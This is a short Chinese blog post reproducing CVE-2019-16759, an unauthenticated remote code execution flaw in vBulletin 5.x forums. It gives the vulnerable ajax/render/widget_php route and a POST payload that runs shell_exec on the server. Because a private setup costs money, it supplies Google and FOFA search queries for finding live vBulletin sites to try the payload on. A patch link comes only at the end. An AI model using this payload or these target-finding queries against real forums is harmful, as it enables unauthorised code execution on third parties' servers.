温馨提示×

温馨提示×

您好,登录后才能下订单哦!

密码登录×
登录注册×
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》

vBulletin 5.x未授权RCE漏洞CVE-2019-16759复现分析

发布时间:2021-12-20 18:10:28 来源:亿速云 阅读:360 作者:柒染 栏目:大数据

vBulletin 5.x未授权RCE漏洞CVE-2019-16759复现分析,针对这个问题,这篇文章详细介绍了相对应的分析和解答,希望可以帮助更多想解决这个问题的小伙伴找到更简单易行的方法。


0x00 简介

vBulletin是一个收费低廉但强大的建站BBS(论坛)CMS,该CMS国外大量论坛使用,中国国内少许网站使用。近日,vBulletin 5.x爆出一个前台远程代码执行漏洞,无需登录即可触发。该论坛程序在国外的国外的用户量就类似dz论坛在国内的用户量。

0x01 漏洞概述

漏洞通过请求ajax/render/widget_php进行模板注入触发代码执行。

0x02 影响范围

5.0.0 <= vBulletin <=5.5.4

0x03 环境搭建

自行搭建需要付费,因此这里使用google语法和FOFA查找

google语法:

site:*.vbulletin.net

Powered by vBulletin

FOFA:

content="vBulletin"
app="vBulletin"

在线靶场获取方式

转发本文至朋友圈并截图发至公众号内即可

0x04 漏洞利用

进入如下vBulletin论坛

vBulletin 5.x未授权RCE漏洞CVE-2019-16759复现分析

访问/index.php?routestring=ajax/render/widget_php会显示以下结果

vBulletin 5.x未授权RCE漏洞CVE-2019-16759复现分析

然后POST如下数据即可执行命令whoami

widgetConfig[code] = echo shell_exec('whoami'); exit;

vBulletin 5.x未授权RCE漏洞CVE-2019-16759复现分析

0x05 修复方式

安全更新补丁下载:

http://members.vbulletin.com/patches.php

关于vBulletin 5.x未授权RCE漏洞CVE-2019-16759复现分析问题的解答就分享到这里了,希望以上内容可以对大家有一定的帮助,如果你还有很多疑惑没有解开,可以关注亿速云行业资讯频道了解更多相关知识。

向AI问一下细节

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

AI